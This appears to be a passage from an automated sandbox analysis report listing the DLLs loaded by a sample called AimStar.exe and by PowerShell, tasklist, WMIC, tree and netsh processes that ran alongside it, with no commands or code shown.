Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
